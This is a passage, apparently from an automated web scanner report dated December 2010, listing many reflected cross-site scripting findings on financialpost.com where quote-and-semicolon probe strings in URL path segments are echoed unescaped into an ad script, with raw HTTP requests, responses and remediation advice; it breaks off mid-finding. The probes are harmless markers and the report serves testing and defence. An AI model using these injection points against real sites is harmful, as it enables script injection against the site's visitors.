<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers1639b';9b5d88f64ad/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers1639b';9b5d88f64ad;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=15492710?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da20f'%3bafe2f9b541b was submitted in the REST URL parameter 3. This input was echoed as da20f';afe2f9b541b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/writing+workers+with+children/3943108da20f'%3bafe2f9b541b/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70161
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing-workers-with-children/3943108da20f';afe2f9b541b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing-workers-with-children;kw=3943108da20f';afe2f9b541b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1b5'%3bbd8a9e4eb8e was submitted in the REST URL parameter 4. This input was echoed as cf1b5';bd8a9e4eb8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/writing+workers+with+children/3943108/cf1b5'%3bbd8a9e4eb8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37340
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2aa'%3b1645e3d562a was submitted in the REST URL parameter 1. This input was echoed as 2f2aa';1645e3d562a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css2f2aa'%3b1645e3d562a/print.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42946
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 680dd'%3b2c367558245 was submitted in the REST URL parameter 2. This input was echoed as 680dd';2c367558245 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/680dd'%3b2c367558245 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42979
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3389'%3bbf445645e7b was submitted in the REST URL parameter 1. This input was echoed as c3389';bf445645e7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cssc3389'%3bbf445645e7b/story_widget.min.css HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:08 GMT
Date: Sun, 19 Dec 2010 02:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43144
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bee00'%3b7dd73a18789 was submitted in the REST URL parameter 2. This input was echoed as bee00';7dd73a18789 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/bee00'%3b7dd73a18789 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec90'%3bc33f3436c73 was submitted in the REST URL parameter 1. This input was echoed as 7ec90';c33f3436c73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur7ec90'%3bc33f3436c73/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44045
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c621'%3b702d19f034f was submitted in the REST URL parameter 1. This input was echoed as 9c621';702d19f034f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur9c621'%3b702d19f034f/Hidden+angels+Magnet+aspiring+startups/3967315/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83762
Expires: Sun, 19 Dec 2010 03:14:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur9c621';702d19f034f/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur9c621';702d19f034f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70166368?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba98e'%3bb4d3a3bee90 was submitted in the REST URL parameter 3. This input was echoed as ba98e';b4d3a3bee90 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315ba98e'%3bb4d3a3bee90/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 47894
Expires: Sun, 19 Dec 2010 03:14:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden-angels-magnet-aspiring-startups/3967315ba98e';b4d3a3bee90/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden-angels-magnet-aspiring-startups;kw=3967315ba98e';b4d3a3bee90;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9386'%3bab3ee5a69d was submitted in the REST URL parameter 4. This input was echoed as a9386';ab3ee5a69d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/a9386'%3bab3ee5a69d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37683
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba574'%3b9b0c1337c4a was submitted in the REST URL parameter 1. This input was echoed as ba574';9b0c1337c4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurba574'%3b9b0c1337c4a/Partners+leverage+gift+card+idea/3931988/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82924
Expires: Sun, 19 Dec 2010 03:14:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurba574';9b0c1337c4a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurba574';9b0c1337c4a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=36654678?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547fc'%3b614300144fa was submitted in the REST URL parameter 3. This input was echoed as 547fc';614300144fa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Partners+leverage+gift+card+idea/3931988547fc'%3b614300144fa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54486
Expires: Sun, 19 Dec 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners-leverage-gift-card-idea/3931988547fc';614300144fa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners-leverage-gift-card-idea;kw=3931988547fc';614300144fa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38251'%3b14ab344cd5d was submitted in the REST URL parameter 4. This input was echoed as 38251';14ab344cd5d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Partners+leverage+gift+card+idea/3931988/38251'%3b14ab344cd5d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37570
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2289'%3bea2284d08bf was submitted in the REST URL parameter 1. This input was echoed as b2289';ea2284d08bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurb2289'%3bea2284d08bf/Social+media+gives+medium+life/3931982/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78583
Expires: Sun, 19 Dec 2010 03:14:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurb2289';ea2284d08bf/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurb2289';ea2284d08bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25921326?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314a3'%3b231830f9dd8 was submitted in the REST URL parameter 3. This input was echoed as 314a3';231830f9dd8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Social+media+gives+medium+life/3931982314a3'%3b231830f9dd8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54415
Expires: Sun, 19 Dec 2010 03:14:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:52 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social-media-gives-medium-life/3931982314a3';231830f9dd8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social-media-gives-medium-life;kw=3931982314a3';231830f9dd8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+' ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc98'%3ba15a08852bc was submitted in the REST URL parameter 4. This input was echoed as afc98';a15a08852bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
